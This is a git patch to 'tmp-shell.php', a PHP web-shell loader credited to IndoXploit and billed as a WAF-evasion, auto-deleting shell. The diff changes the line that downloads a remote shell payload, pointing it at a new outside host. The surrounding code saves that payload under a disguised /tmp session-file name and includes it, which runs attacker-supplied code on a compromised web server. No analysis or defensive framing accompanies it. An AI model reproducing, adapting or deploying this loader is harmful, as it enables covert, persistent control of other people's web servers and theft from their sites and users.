From ce7e21cf7f9c064d33591d1965de772ec25867dc Mon Sep 17 00:00:00 2001 From: sandanisa <92909605+sandanisa@users.noreply.github.com> Date: Fri, 14 Oct 2022 17:34:05 +0700 Subject: [PATCH] Update tmp-shell.php --- tmp-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tmp-shell.php b/tmp-shell.php index 29e5a9e..0907dd6 100644 --- a/tmp-shell.php +++ b/tmp-shell.php @@ -3,7 +3,7 @@ # Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell) # Coded by: L0c4lh34rtz - IndoXploit -$data = ['https://raw.githubusercontent.com/indoxploit-coders/indoxploit-shell/master/shell-v3.php', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php']; +$data = ['https://shell.prinsh.com/Nathan/eviltwin.txt', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php']; if(file_exists($data[1]) && filesize($data[1]) !== 0) { include($data[1]);